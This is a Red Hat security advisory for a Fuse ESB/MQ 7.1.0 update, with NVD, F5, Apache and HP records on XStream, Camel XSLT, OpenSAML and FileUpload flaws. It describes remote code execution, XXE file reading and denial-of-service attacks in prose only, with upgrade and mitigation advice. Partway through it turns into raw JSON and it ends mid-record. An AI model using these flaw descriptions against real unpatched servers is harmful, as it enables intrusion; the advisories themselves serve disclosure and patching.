ID: RHSA-2014:0452
Type: redhat
Reporter: RedHat
Modified: 2019-03-22T23:43:52
Description
Fuse ESB Enterprise is an integration platform based on Apache ServiceMix.
Fuse MQ Enterprise, based on Apache ActiveMQ, is a standards-compliant
messaging system that is tailored for use in mission critical applications.

This release of Fuse ESB Enterprise/MQ Enterprise 7.1.0 R1 P3 is an update
to Fuse ESB Enterprise 7.1.0 and Fuse MQ Enterprise 7.1.0. It includes
various bug fixes, which are listed in the README file included with the
patch files.

The following security issues are also addressed with this release:

It was found that XStream could deserialize arbitrary user-supplied XML
content, representing objects of any type. A remote attacker able to pass
XML to XStream could use this flaw to perform a variety of attacks,
including remote code execution in the context of the server running the
XStream application. (CVE-2013-7285)

It was found that the Apache Camel XSLT component allowed XSL stylesheets
to call external Java methods. A remote attacker able to submit messages to
a Camel route could use this flaw to perform arbitrary remote code
execution in the context of the Camel server process. (CVE-2014-0003)

It was found that the ParserPool and Decrypter classes in the OpenSAML Java
implementation resolved external entities, permitting XML External Entity
(XXE) attacks. A remote attacker could use this flaw to read files
accessible to the user running the application server and, potentially,
perform other more advanced XXE attacks. (CVE-2013-6440)

It was found that the Apache Camel XSLT component would resolve entities in
XML messages when transforming them using an XSLT route. A remote attacker
able to submit messages to an XSLT Camel route could use this flaw to read
files accessible to the user running the application server and,
potentially, perform other more advanced XXE attacks. (CVE-2014-0002)

A denial of service flaw was found in the way Apache Commons FileUpload
handled small-sized buffers used by MultipartStream. A remote attacker
could use this flaw to create a malformed Content-Type header for a
multipart request, causing Apache Commons FileUpload to enter an infinite
loop when processing such an incoming request. (CVE-2014-0050)

The CVE-2014-0002 and CVE-2014-0003 issues were discovered by David Jorm of
the Red Hat Security Response Team, and the CVE-2013-6440 issue was
discovered by David Illsley, Ron Gutierrez of Gotham Digital Science, and
David Jorm of the Red Hat Security Response Team.

All users of Fuse ESB Enterprise/MQ Enterprise 7.1.0 as provided from the
Red Hat Customer Portal are advised to upgrade to Fuse ESB Enterprise/MQ
Enterprise 7.1.0 R1 P3.

Title: (RHSA-2014:0452) Important: Fuse ESB Enterprise/Fuse MQ Enterprise 7.1.0 update
Published: 2014-04-30T04:00:00
CVSS: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
URL: https://access.redhat.com/errata/RHSA-2014:0452
CVE list: CVE-2013-6440, CVE-2013-7285, CVE-2014-0002, CVE-2014-0003, CVE-2014-0050

CVE records (NVD)

CVE-2013-7285 (CWE-77; CVSS v2 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P; CVSS v3 9.8, CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Xstream API versions up to 1.4.6 and version 1.4.10, if the security
framework has not been initialized, may allow a remote attacker to run
arbitrary shell commands by manipulating the processed input stream when
unmarshaling XML or any supported format. e.g. JSON.
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7285

CVE-2013-6440 (CWE-200; CVSS v2 5.0, AV:N/AC:L/Au:N/C:P/I:N/A:N; published 2014-02-14)
The (1) BasicParserPool, (2) StaticBasicParserPool, (3) XML Decrypter, and
(4) SAML Decrypter in Shibboleth OpenSAML-Java before 2.6.1 set the
expandEntityReferences property to true, which allows remote attackers to
conduct XML external entity (XXE) attacks via a crafted XML DOCTYPE
declaration.
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6440

CVE-2014-0002 (CWE-264; CVSS v2 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P; published 2014-03-21)
The XSLT component in Apache Camel before 2.11.4 and 2.12.x before 2.12.3
allows remote attackers to read arbitrary files and possibly have other
unspecified impact via an XML document containing an external entity
declaration in conjunction with an entity reference, related to an XML
External Entity (XXE) issue.
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0002

CVE-2014-0003 (CWE-264; CVSS v2 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P; published 2014-03-21)
The XSLT component in Apache Camel 2.11.x before 2.11.4, 2.12.x before
2.12.3, and possibly earlier versions allows remote attackers to execute
arbitrary Java methods via a crafted message.
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0003

CVE-2014-0050 (CWE-264; CVSS v2 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P; published 2014-04-01)
MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in
Apache Tomcat, JBoss Web, and other products, allows remote attackers to
cause a denial of service (infinite loop and CPU consumption) via a crafted
Content-Type header that bypasses a loop's intended exit conditions.
The previous CVSS assessment (Base Score: 5.0 - AV:N/AC:L/AU:N/C:N/I:N/A:P)
was provided at the time of initial analysis based on the best available
published information at that time. The score has been updated to reflect
the impact to Oracle products per Oracle Critical Patch Update Advisory -
October 2015
(http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html).
Other products listed as vulnerable may or may not be similarly impacted.
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050

Related Red Hat advisories

RHSA-2014:0323 - Important: Red Hat JBoss Fuse/A-MQ 6.0.0 security update
Published: 2014-03-24T21:55:48
CVE list: CVE-2013-7285, CVE-2014-0002, CVE-2014-0003
https://access.redhat.com/errata/RHSA-2014:0323

RHSA-2014:0459 - Important: Red Hat JBoss Fuse Service Works 6.0.0 security update
Published: 2014-04-30T22:58:30
CVE list: CVE-2013-4286, CVE-2014-0002, CVE-2014-0003, CVE-2014-0050
https://access.redhat.com/errata/RHSA-2014:0459

RHSA-2014:0372 - Important: Red Hat JBoss BRMS 6.0.1 update
Published: 2014-04-04T01:26:33
CVE list: CVE-2011-5245, CVE-2012-0818, CVE-2013-1624, CVE-2013-6468, CVE-2013-7285, CVE-2014-0002, CVE-2014-0003
https://access.redhat.com/errata/RHSA-2014:0372

Red Hat JBoss BPM Suite 6.0.1 (serves as a replacement for Red Hat JBoss BPM Suite 6.0.0)
CVE list: CVE-2011-5245, CVE-2012-0818, CVE-2013-1624, CVE-2013-6468, CVE-2013-7285, CVE-2014-0002, CVE-2014-0003
The Release Notes will be available\nat https://access.redhat.com/site/documentation/Red_Hat_JBoss_BPM_Suite/\n\nThe following security issues are fixed with this release:\n\nIt was discovered that JBoss BPM Suite allowed remote authenticated users\nto submit arbitrary Java code in MVFLEX Expression Language (MVEL) or JBoss\nRules expressions, resulting in arbitrary code execution within the\nsecurity context of the application server. Refer to the Solution section\nfor details on the fix for this issue. (CVE-2013-6468)\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. A remote attacker able to pass\nXML to XStream could use this flaw to perform a variety of attacks,\nincluding remote code execution in the context of the server running the\nXStream application. (CVE-2013-7285)\n\nIt was found that the Apache Camel XSLT component allowed XSL stylesheets\nto call external Java methods. A remote attacker able to submit messages to\na Camel route could use this flaw to perform arbitrary remote code\nexecution in the context of the Camel server process. (CVE-2014-0003)\n\nIt was found that RESTEasy was vulnerable to XML External Entity (XXE)\nattacks. If a remote attacker submitted a request containing an external\nXML entity to a RESTEasy endpoint, the entity would be resolved, allowing\nthe attacker to read files accessible to the user running the application\nserver. This flaw affected DOM (Document Object Model) Document and JAXB\n(Java Architecture for XML Binding) input. (CVE-2011-5245, CVE-2012-0818)\n\nIt was discovered that bouncycastle leaked timing information when\ndecrypting TLS/SSL protocol encrypted records when CBC-mode cipher suites\nwere used. A remote attacker could possibly use this flaw to retrieve plain\ntext from the encrypted packets by using a TLS/SSL server as a padding\noracle. 
(CVE-2013-1624)\n\nIt was found that the Apache Camel XSLT component would resolve entities in\nXML messages when transforming them using an XSLT route. A remote attacker\nable to submit messages to an XSLT Camel route could use this flaw to read\nfiles accessible to the user running the application server and,\npotentially, perform other more advanced XML External Entity (XXE) attacks.\n(CVE-2014-0002)\n\nThe CVE-2014-0002 and CVE-2014-0003 issues were discovered by David Jorm of\nthe Red Hat Security Response Team, and the CVE-2013-6468 issue was\ndiscovered by Marc Schoenefeld of the Red Hat Security Response Team.\n\nRed Hat would like to thank Gr\u00e9gory Draperi for independently reporting\nCVE-2013-6468.\n\nAll users of Red Hat JBoss BPM Suite 6.0.0 as provided from the Red Hat\nCustomer Portal are advised to upgrade to Red Hat JBoss BPM Suite 6.0.1.", "modified": "2019-02-20T17:14:00", "published": "2014-04-04T01:08:23", "id": "RHSA-2014:0371", "href": "https://access.redhat.com/errata/RHSA-2014:0371", "type": "redhat", "title": "(RHSA-2014:0371) Important: Red Hat JBoss BPM Suite 6.0.1 update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7285"], "description": "XStream is a simple library to serialize and de-serialize objects to and\nfrom XML.\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. A remote attacker able to pass\nXML to XStream could use this flaw to perform a variety of attacks,\nincluding remote code execution in the context of the server running the\nXStream application. 
(CVE-2013-7285)\n\nAll users of Red Hat JBoss Fuse Service Works 6.0.0 as provided from the\nRed Hat Customer Portal are advised to apply this update.", "modified": "2019-02-20T17:13:18", "published": "2014-02-27T01:31:01", "id": "RHSA-2014:0216", "href": "https://access.redhat.com/errata/RHSA-2014:0216", "type": "redhat", "title": "(RHSA-2014:0216) Important: XStream security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7285"], "description": "The Red Hat Enterprise Virtualization reports package provides a suite of\npre-configured reports and dashboards that enable you to monitor the\nsystem. The reports module is based on JasperReports and JasperServer, and\ncan also be used to create ad-hoc reports.\n\nXStream is a simple library used by the Red Hat Enterprise Virtualization\nreports package to serialize and de-serialize objects to and from XML.\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. A remote attacker able to pass\nXML to XStream could use this flaw to perform a variety of attacks,\nincluding remote code execution in the context of the server running the\nXStream application. 
(CVE-2013-7285)\n\nAll jasperreports-server-pro users are advised to upgrade to this updated\npackage, which contains a backported patch to correct this issue.\n", "modified": "2018-06-07T09:00:06", "published": "2014-04-09T04:00:00", "id": "RHSA-2014:0389", "href": "https://access.redhat.com/errata/RHSA-2014:0389", "type": "redhat", "title": "(RHSA-2014:0389) Important: jasperreports-server-pro security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:26", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7285"], "description": "XStream is a simple library to serialize and de-serialize objects to and\nfrom XML.\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. A remote attacker able to pass\nXML to XStream could use this flaw to perform a variety of attacks,\nincluding remote code execution in the context of the server running the\nXStream application. (CVE-2013-7285)\n\nThe main distribution of Red Hat JBoss Data Virtualization 6.0.0 does not\ncontain the vulnerable XStream library and is not vulnerable to\nCVE-2013-7285. 
Only users of Red Hat JBoss Data Virtualization 6.0.0 who\ninstalled an optional S-RAMP distribution as provided from the Red Hat\nCustomer Portal are advised to apply this update.", "modified": "2019-02-20T17:13:39", "published": "2014-03-13T23:11:29", "id": "RHSA-2014:0294", "href": "https://access.redhat.com/errata/RHSA-2014:0294", "type": "redhat", "title": "(RHSA-2014:0294) Important: XStream security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:34:13", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4517", "CVE-2013-6440"], "description": "Red Hat JBoss Portal is the open source implementation of the Java EE suite\nof services and Portal services running atop Red Hat JBoss Enterprise\nApplication Platform.\n\nThis Red Hat JBoss Portal 6.1.1 release serves as a replacement for 6.1.0.\nRefer to the 6.1.1 Release Notes for further information, available shortly\nfrom https://access.redhat.com/site/documentation/en-US/\n\nIt was found that the ParserPool and Decrypter classes in the OpenSAML Java\nimplementation resolved external entities, permitting XML External Entity\n(XXE) attacks. A remote attacker could use this flaw to read files\naccessible to the user running the application server, and potentially\nperform other more advanced XXE attacks. (CVE-2013-6440)\n\nIt was discovered that the Apache Santuario XML Security for Java project\nallowed Document Type Definitions (DTDs) to be processed when applying\nTransforms even when secure validation was enabled. A remote attacker could\nuse this flaw to exhaust all available memory on the system, causing a\ndenial of service. 
(CVE-2013-4517)\n\nAll users of Red Hat JBoss Portal 6.1.0 as provided from the Red Hat\nCustomer Portal are advised to upgrade to Red Hat JBoss Portal 6.1.1.", "modified": "2019-02-20T17:12:57", "published": "2014-02-20T22:16:59", "id": "RHSA-2014:0195", "href": "https://access.redhat.com/errata/RHSA-2014:0195", "type": "redhat", "title": "(RHSA-2014:0195) Moderate: Red Hat JBoss Portal 6.1.1 update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T14:34:20", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in the JBoss Web component of JBoss EAP, handled\nsmall-sized buffers used by MultipartStream. A remote attacker could use\nthis flaw to create a malformed Content-Type header for a multipart\nrequest, causing JBoss Web to enter an infinite loop when processing such\nan incoming request. 
(CVE-2014-0050)\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 as\nprovided from the Red Hat Customer Portal are advised to apply this update.\nThe JBoss server process must be restarted for the update to take effect.", "modified": "2019-02-20T17:13:40", "published": "2014-03-05T23:50:05", "id": "RHSA-2014:0252", "href": "https://access.redhat.com/errata/RHSA-2014:0252", "type": "redhat", "title": "(RHSA-2014:0252) Moderate: Red Hat JBoss Enterprise Application Platform 6.2.1 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:44:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in the JBoss Web component of JBoss EAP, handled\nsmall-sized buffers used by MultipartStream. A remote attacker could use\nthis flaw to create a malformed Content-Type header for a multipart\nrequest, causing JBoss Web to enter an infinite loop when processing such\nan incoming request. 
(CVE-2014-0050)\n\nWarning: Before applying this update, back up your existing Red Hat JBoss\nEnterprise Application Platform installation and deployed applications.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.2.1 on Red Hat\nEnterprise Linux 5 and 6 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.\n", "modified": "2018-06-07T02:39:08", "published": "2014-03-05T05:00:00", "id": "RHSA-2014:0253", "href": "https://access.redhat.com/errata/RHSA-2014:0253", "type": "redhat", "title": "(RHSA-2014:0253) Moderate: Red Hat JBoss Enterprise Application Platform 6.2.1 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2019-07-02T20:43:47", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "\nF5 Product Development has assigned ID 452318 (BIG-IP) and ID 452803 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H455619 on the **Diagnostics** > **Identified** > **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP AAM| 11.4.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP AFM| 11.3.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP Analytics| 11.0.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 
\n11.2.1 HF16| Configuration utility \nBIG-IP APM| 11.0.0 - 11.5.4 \n10.1.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP ASM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| 11.2.1 HF16| Configuration utility \nBIG-IP GTM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP Link Controller| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP PEM| 11.3.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| 11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| 11.2.1 HF16| Configuration utility \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| 11.2.1 HF16| Configuration utility \nARX| None| 6.0.0 - 6.4.0| None \nEnterprise Manager| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| None| Configuration utility \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit access to the Configuration utility only over a secure network.\n\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2018-02-06T01:03:00", "published": "2014-04-19T00:53:00", "id": "F5:K15189", "href": "https://support.f5.com/csp/article/K15189", "title": "Apache Commons FileUpload vulnerability CVE-2014-0050", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-09-26T17:22:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit access to the Configuration utility only over a secure network.\n\nSupplemental Information\n\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2016-08-16T00:00:00", "published": "2014-04-18T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15189.html", "id": "SOL15189", "title": "SOL15189 - Apache Commons FileUpload vulnerability CVE-2014-0050", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- - Commons FileUpload 1.0 to 1.3\r\n- - Apache Tomcat 8.0.0-RC1 to 8.0.1\r\n- - Apache Tomcat 7.0.0 to 7.0.50\r\n- - Apache Tomcat 6 and earlier are not affected\r\n\r\nApache Tomcat 7 and Apache Tomcat 8 use a packaged renamed copy of\r\nApache Commons FileUpload to implement the requirement of the Servlet\r\n3.0 and later specifications to support the processing of\r\nmime-multipart requests. Tomcat 7 and 8 are therefore affected by this\r\nissue. 
While Tomcat 6 uses Commons FileUpload as part of the Manager\r\napplication, access to that functionality is limited to authenticated\r\nadministrators.\r\n\r\nDescription:\r\nIt is possible to craft a malformed Content-Type header for a\r\nmultipart request that causes Apache Commons FileUpload to enter an\r\ninfinite loop. A malicious user could, therefore, craft a malformed\r\nrequest that triggered a denial of service.\r\nThis issue was reported responsibly to the Apache Software Foundation\r\nvia JPCERT but an error in addressing an e-mail led to the unintended\r\nearly disclosure of this issue[1].\r\n\r\nMitigation:\r\nUsers of affected versions should apply one of the following mitigations\r\n- - Upgrade to Apache Commons FileUpload 1.3.1 or later once released\r\n- - Upgrade to Apache Tomcat 8.0.2 or later once released\r\n- - Upgrade to Apache Tomcat 7.0.51 or later once released\r\n- - Apply the appropriate patch\r\n - Commons FileUpload: http://svn.apache.org/r1565143\r\n - Tomcat 8: http://svn.apache.org/r1565163\r\n - Tomcat 7: http://svn.apache.org/r1565169\r\n- - Limit the size of the Content-Type header to less than 4091 bytes\r\n\r\nCredit:\r\nThis issue was reported to the Apache Software Foundation via JPCERT.\r\n\r\nReferences:\r\n[1] http://markmail.org/message/kpfl7ax4el2owb3o\r\n[2] http://tomcat.apache.org/security-8.html\r\n[3] http://tomcat.apache.org/security-7.html\r\n",
"edition": 1, "modified": "2014-03-31T00:00:00", "published": "2014-03-31T00:00:00", "id": "SECURITYVULNS:DOC:30435", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30435", "title": "[SECURITY] CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-2122", "CVE-2014-0050"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04657823\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04657823\r\nVersion: 1\r\n\r\nHPSBGN03329 rev.1 - HP SDN VAN Controller, Remote Denial of Service (DoS),\r\nDistributed Denial of Service (DDoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2015-05-11\r\nLast Updated: 2015-05-11\r\n\r\nPotential 
Security Impact: Remote Denial of Service (DoS), Distributed Denial\r\nof Service (DDoS)\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP SDN VAN\r\nController. The vulnerabilities could be remotely exploited resulting in\r\nDenial of Service (DoS) or a Distributed Denial of Service (DDoS).\r\n\r\nReferences:\r\n\r\n CVE-2014-0050 Remote Denial of Service (DoS)\r\n\r\n CVE-2015-2122 Remote Distributed Denial of Service (DDoS)\r\n\r\n SSRT102049\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP SDN VAN Controller version 2.5 and earlier.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0050 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-2122 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP recommends either of the two following workarounds for the vulnerabilities\r\nin the HP SDN VAN Controller.\r\n\r\n - The network for the server running the HP SDN VAN Controller management\r\nVLAN should be on a separate and isolated "management" VLAN.\r\n\r\n - Configure the firewall on the server running HP SDN VAN Controller so\r\nthat the only network traffic allowed to the REST port is from trusted\r\nservers on the network that need to use the REST layer. 
For example: the\r\nMicrosoft Lync Server for Optimizer.\r\n\r\n For more detailed information, please refer to the "Securing REST layer\r\nAccess on HP VAN SDN Controllers" article at the following location:\r\n\r\n http://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=em\r\nr_na-c04676756\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 11 May 2015 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2015 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. 
The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlVQ3n0ACgkQ4B86/C0qfVleJgCg+qPCFTzdKRL5cLe4eNH7Q82V\r\nw80AoOpSvjMM19ssS++abLKV1S+kypwk\r\n=Wtwj\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2015-05-11T00:00:00", "published": "2015-05-11T00:00:00", "id": "SECURITYVULNS:DOC:32033", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32033", "title": "[security bulletin] HPSBGN03329 rev.1 - HP SDN VAN Controller, Remote Denial of Service (DoS), Distributed Denial of Service (DDoS)", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-2122", "CVE-2014-0050"], "description": "No description provided", "edition": 1, "modified": "2015-05-11T00:00:00", "published": "2015-05-11T00:00:00", "id": "SECURITYVULNS:VULN:14470", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14470", "title": "HP SDN VAN Controller DoS", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:31:33", "description": 
